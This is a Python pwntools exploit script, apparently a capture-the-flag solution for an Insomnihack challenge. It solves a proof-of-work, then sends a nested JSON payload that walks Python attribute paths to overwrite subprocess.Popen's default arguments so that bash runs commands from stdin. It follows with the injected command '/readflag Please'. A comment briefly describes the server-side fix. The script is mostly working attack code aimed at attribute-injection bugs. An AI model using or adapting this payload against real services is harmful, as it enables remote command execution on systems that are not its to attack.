import hashlib
import json
import secrets
import socket

import tqdm
from pwn import *

import ppp
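# Mirrors the positional default tuple of subprocess.Popen.__init__
# (bufsize, executable, stdin, stdout, stderr, preexec_fn, close_fds, shell,
# cwd, env, universal_newlines, startupinfo, creationflags, restore_signals,
# start_new_session, pass_fds); only `executable` and `env` differ from
# CPython's own defaults.
popen_defaults = [-1, "/bin/bash", None, None, None, None, True, False,
                  None, {"BASH_ENV": "/proc/self/fd/0"}, None, None, 0, True,
                  False, []]

# Proof-of-work search: draw random 16-byte hex tokens until
# ppp.is_valid_proof accepts one for the current nonce. The iteration bound
# keeps a bad nonce from spinning forever; for/else raises if it is hit.
for _ in tqdm.trange(50_000_000):
    nonce = ppp.generate_nonce()
    data = secrets.token_hex(16)
    if ppp.is_valid_proof(data, nonce):
        break
else:
    raise RuntimeError("proof-of-work search exhausted without a valid proof")

# Named proof_hash rather than `hash` so the builtin is not shadowed.
proof_hash = hashlib.sha256(f'{data}{nonce}'.encode()).hexdigest()

# Request object. Besides the proof-of-work fields, the nested "get_data"
# entry spells out the attribute path
#   get_data.__func__.__globals__.subprocess.Popen.__init__.__defaults__
# with popen_defaults as its leaf. The service presumably applies JSON keys
# as attribute writes (inferred from the payload shape; the server code is
# not on this page). That is the defect to fix server-side: untrusted keys
# must be allowlisted, and any name beginning with "_" rejected, before they
# are applied to an object.
obj = {
    "data": data,
    "nonce": nonce,
    "hash": proof_hash,
    "get_data": {
        "__func__": {
            "__globals__": {
                "subprocess": {
                    "Popen": {
                        "__init__": {
                            "__defaults__": popen_defaults
                        }
                    }
                }
            }
        }
    }
}
payload = json.dumps(obj)

print("running")
r = remote("ppp.insomnihack.ch", 12345)
# TCP_NODELAY disables Nagle's algorithm so the two small writes below are
# not coalesced or delayed.
r.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
print(r.recvline())  # first line sent by the service (banner/prompt)
r.sendline(payload)
r.sendline("/readflag Please")
# Half-close the sending side so the peer observes EOF, then hand the
# session over for reading whatever comes back.
r.shutdown('send')
r.interactive()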